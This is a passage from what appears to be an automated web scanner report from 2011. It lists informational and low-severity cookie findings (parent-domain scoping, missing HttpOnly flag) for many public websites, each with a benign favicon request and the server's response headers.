Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:14 GMT
Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1
Set-Cookie: Apache=173.193.214.243.1301751794799394; path=/; max-age=31536000; domain=.sfgate.com
Last-Modified: Thu, 12 Aug 2004 16:20:01 GMT
ETag: "3e1a58-37e-3e17756a8640c"
Accept-Ranges: bytes
Content-Length: 894
Vary: Accept-Encoding
Content-Type: image/x-icon

...[SNIP]...

13.70. http://www.sharebuilder.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sharebuilder.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sharebuilder.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 120
Content-Type: text/html; charset=utf-8
Location: /
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=48060E2F4787FE63D9C25ABE8201A785; Path=/; Domain=.sharebuilder.com
Set-Cookie: TLTSID=48060E2F4787FE63D9C25ABE8201A785; Path=/; Domain=.sharebuilder.com
HostName: A110
Date: Sat, 02 Apr 2011 13:43:01 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f">here</a>.</h2>
</body></html>

13.71. http://www.terra.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.terra.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:41 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301753981.696717; path=/; expires=Fri, 01-Jan-2016 00:02:40 GMT; domain=.terra.com
Last-Modified: Tue, 05 Dec 2006 21:40:32 GMT
ETag: "1808f-14a6-423e250cc7400"
Accept-Ranges: bytes
Content-Length: 5286
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon

...[SNIP]...

13.72. http://www.thefind.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefind.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefind.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:08 GMT
Server: Apache
Set-Cookie: flsid=6c696ac09826ae214b6b34932fd74779; path=/
Expires: Sat, 02 Apr 2011 12:53:08 GMT
Cache-Control: public, s-maxage=600, max-age=600
Last-Modified: Thu, 31 Mar 2011 05:45:57 GMT
Set-Cookie: fl-uid=c4b368f36983c5eb4b2448a842ace642%2C1%2C1301748188; expires=Sun, 01-Apr-2012 12:43:08 GMT; path=/; domain=.thefind.com
Content-Language: en
Status: 200 OK
Content-Length: 1406
Content-Type: image/x-icon; charset=utf-8

...[SNIP]...

13.73. http://www.thehollywoodgossip.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehollywoodgossip.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehollywoodgossip.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: mut=173.193.214.243.1301751604816322; path=/; expires=Sat, 30-Apr-11 13:40:04 GMT; domain=.thehollywoodgossip.com
Last-Modified: Thu, 21 Jan 2010 21:11:14 GMT
ETag: "4105de-cbe-47db324a12080"
Accept-Ranges: bytes
Content-Length: 3262
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 13:40:04 GMT
Vary: User-Agent
Connection: close
Content-Type: image/x-icon

...... ..............(... ...@...............................###..............................#)#......krgBQC......_fZ....................................###...............................&.......
...[SNIP]...

13.74. http://www.ticketmaster.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ticketmaster.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "57e-b383d900"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:24:52 GMT
Connection: close
Set-Cookie: SID=nD7GlUEnkxIP7ANtKRu_CqupVk7ohnaWjtsXe2PfX3lEBQ0y0XLy9mY0z8iGhhi7LrunY3_V4W0yuO2C; path=/; domain=.ticketmaster.com
Set-Cookie: BID=lz41VXDuH8Qe3yaFuANwwdc3BoxcSfn9rNCei9TRY0xbrM0XOwjSaO9-SbjUBaNKf_diTAs_bb8iLBHP7ztS; path=/; domain=.ticketmaster.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=NVcfObc34CW8xvG3eaHZhEljjPhSeod21tXLKa8jNojh1fiM0CkpSQ==; path=/

...[SNIP]...

13.75. http://www.travelocity.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelocity.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:08 GMT
Server: Apache
Set-Cookie: TVLY_GEO=|||||; path=/; domain=.travelocity.com; expires=Sat, 02-Apr-2011 16:28:08 GMT
Set-Cookie: tyrg1st=8FE61A00E4F9500A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.travelocity.com
Last-Modified: Tue, 30 Mar 2004 00:21:00 GMT
ETag: "57e"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding
Connection: close
Content-Type: image/x-icon

...[SNIP]...

13.76. http://www.true.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.true.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.true.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 20 Jul 2004 18:39:21 GMT
Accept-Ranges: bytes
ETag: "8012ddf886ec41:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:39 GMT
Content-Length: 894
Set-Cookie: NSC_xxx-mc-hsq=445337273660;path=/;domain=true.com

...[SNIP]...

13.77. http://www.uhaul.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uhaul.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uhaul.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Fri, 13 Aug 2010 17:37:08 GMT
Accept-Ranges: bytes
ETag: "3bc28f27e3bcb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: TLTSID=0F8F14C64A2E7D1EA96C289BDA4E02E6; Path=/; Domain=.uhaul.com
Set-Cookie: TLTUID=0F8F14C64A2E7D1EA96C289BDA4E02E6; Path=/; Domain=.uhaul.com; expires=Sat, 02-04-2021 13:57:29 GMT
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:57:28 GMT
Content-Length: 1438

...[SNIP]...

13.78. http://www.united.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.united.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.united.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8a
Set-Cookie: v1st=DDE5B3A5816CD2D9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.united.com
Last-Modified: Fri, 04 Mar 2011 06:10:29 GMT
Accept-Ranges: bytes
Content-Length: 894
Content-Type: image/x-icon
Set-Cookie: fullsite
Set-Cookie: NSC_Vojufe_HSQ=ffffffffd25f668d45525d5f4f58455e445a4a423660;Version=1;path=/;httponly

...[SNIP]...

13.79. http://www.veoh.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.veoh.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Set-Cookie: veohCookie="VisitorUID=D44A495F-8033-AE3D-9C5D-F70504C464C9&LastUpdate=02/Apr/2011:06:34:13 -0700&first=0"; domain=.veoh.com; Expires=Wed, 01 Apr 2015 13:34:13 GMT; Path=/
Content-Length: 2550
Date: Sat, 02 Apr 2011 13:34:13 GMT
Last-Modified: Thu, 31 Mar 2011 10:42:18 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
Content-Type: image/x-icon

...[SNIP]...

13.80. http://www.verisign.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verisign.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:34 GMT
Server: Apache
Set-Cookie: v1st=1ECA364D37B527F1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
ETag: "28e933b-1536-49a38fa8970c0"
Accept-Ranges: bytes
Content-Length: 5430
Content-Type: text/html

...[SNIP]...

13.81. http://www.virtualtourist.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtualtourist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.virtualtourist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Jetty(6.1.14)
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:53:04 GMT
Accept-Ranges: bytes
Set-Cookie: VTT=64.14.197.3.1301752384.816877; Path=/; Domain=.virtualtourist.com
Last-Modified: Tue, 15 Mar 2011 01:29:34 GMT
Content-Length: 708

...[SNIP]...

13.82. http://www.vistaprint.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vistaprint.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vistaprint.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Tue, 28 Dec 2010 18:23:24 GMT
Accept-Ranges: bytes
P3P: CP="VPRT "
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:31:15 GMT
Connection: close
Set-Cookie: v1st=CA22C9248E11B2CF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.vistaprint.com

...[SNIP]...

13.83. http://www.wachovia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wachovia.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wachovia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:33:41 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=D2B46F245D2D105D5E8AE140D73CF7D1; Path=/; Domain=.wachovia.com
Location: https://www.wachovia.com/favicon.ico
Vary: Accept-Encoding
Content-Length: 244
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.wachovia.co
...[SNIP]...

13.84. http://www.warnerbros.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.warnerbros.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.warnerbros.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:00 GMT
Server: Apache
X-WBOL-WebServer: www_us
Set-cookie: WBWTID=173.193.214.243-4D97255037F000006CE1590-www-wb-web13; path=/; expires=Friday, 01-Jan-10 12:00:00 GMT; domain=.warnerbros.com;
Last-Modified: Thu, 27 Mar 2008 22:51:38 GMT
ETag: "6174a9-47e-737b280"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon

...[SNIP]...

13.85. http://www.wellsfargo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellsfargo.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wellsfargo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Sat, 02 Apr 2011 12:43:51 GMT
Content-length: 1150
Content-type: image/x-icon
Set-Cookie: v1st=6F0DE9B2A6C80BB2; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Last-modified: Thu, 06 Jan 2011 21:04:58 GMT
Etag: "47e-4d262e7a"
Accept-ranges: bytes

...[SNIP]...

13.86. http://www.whitepages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitepages.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whitepages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 12:38:12 GMT
Status: 200 OK
X-Runtime: 0.02908
ETag: "509dbed9826a8b82280d864c43c645da"
Connection: keep-alive
Set-Cookie: search_beta_test_110331=1; domain=.whitepages.com; path=/; expires=Mon, 02 Apr 2012 12:38:12 GMT
Set-Cookie: wp_endemic_provider=C; domain=.whitepages.com; path=/; expires=Sun, 03 Apr 2011 00:38:12 GMT
Set-Cookie: wp_perm=pid%3DEokXfl0mEeCcYwAfKWTiIA; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:12 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:12 GMT
Set-Cookie: _wpn_sid=dc1ba6490e45f104f1df0d2749bceada; domain=.whitepages.com; path=/
Content-Length: 20020

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Free Peo
...[SNIP]...

13.87. http://www.wsbtv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wsbtv.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wsbtv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 15 Jan 2010 20:07:02 GMT
ETag: "111f567-37e-8bfc0580"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain
Cache-Control: max-age=284
Expires: Sat, 02 Apr 2011 13:55:18 GMT
Date: Sat, 02 Apr 2011 13:50:34 GMT
Connection: close
Set-Cookie: alpha=47ce8f18567b0000aa29974d429400007e2b0000; expires=Tue, 30-Mar-2021 13:50:34 GMT; path=/; domain=.wsbtv.com

...[SNIP]...

13.88. http://www.yellowpages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:06 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: image/x-icon
Content-Length: 5430
Last-Modified: Fri, 01 Apr 2011 18:42:25 GMT
Expires: Mon, 02 May 2011 12:43:06 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT

...[SNIP]...

14. Cookie without HttpOnly flag set
There are 219 instances of this issue:


14.1. http://www.androidcentral.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.androidcentral.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.androidcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: spe
Date: Sat, 02 Apr 2011 14:06:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: SESSff98d42578ac6106ce5b7f80c23f307a=hr1onak19pbmm2diiqpgglrca2; expires=Mon, 25-Apr-2011 17:39:51 GMT; path=/; domain=.androidcentral.com
Last-Modified: Sat, 02 Apr 2011 14:00:10 GMT
ETag: "acfc4415a958e438545290ed1f077f57"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 367789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Home |
...[SNIP]...

14.2. http://www.aon.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aon.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=360E2570D83D50BAD68AE8A16269ABE6; Path=/
Location: http://www.aon.com/default.jsp
Content-Type: text/html;charset=utf-8
Date: Sat, 02 Apr 2011 14:03:32 GMT
Content-Length: 0


14.3. http://www.biglots.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.biglots.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biglots.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:57 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.15 OpenSSL/0.9.8o mod_jk/1.2.31
Set-Cookie: JSESSIONID=9EE15E1A14FD5B47D59D04701296C03D.108prd3; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=utf-8
Content-Length: 30138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- layouts/mai
...[SNIP]...

14.4. http://www.bullishbankers.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bullishbankers.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bullishbankers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:06:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
Set-Cookie: PHPSESSID=a70ecd980c5c9f83309c1b6e14b4625a; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: mtaShowAfter=deleted; expires=Fri, 02-Apr-2010 14:06:41 GMT; path=/
Set-Cookie: mtaVisits=1; expires=Sun, 01-Apr-2012 14:06:42 GMT; path=/
X-Pingback: http://www.bullishbankers.com/xmlrpc.php
Last-Modified: Sat, 02 Apr 2011 14:06:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">


<head profile="ht
...[SNIP]...

14.5. http://www.centurylink.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.centurylink.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.centurylink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico
Date: Sat, 02 Apr 2011 13:41:20 GMT
Set-Cookie: JSESSIONID=058DC83CFF20F0556672C70F0763786E08375B6BF0.dotcomprd4; Path=/
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding,User-Agent
X-Pad: avoid browser bug
Content-Length: 11721


                                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   
       <title>CenturyL
...[SNIP]...

14.6. http://www.chacha.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.chacha.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chacha.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E96D1F42FF3550AE37BF16CECFBB552; Path=/
ETag: W/"9662-1285960496000"
Last-Modified: Fri, 01 Oct 2010 19:14:56 GMT
Content-Language: en-US
Content-Length: 9662
Date: Sat, 02 Apr 2011 12:43:27 GMT

...[SNIP]...

14.7. http://www.emedicinehealth.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.emedicinehealth.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.emedicinehealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: /images/fav/emh.ico
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAQCRSBDB=OFANAHPCLOBCCKCBDEMOCPGC; path=/
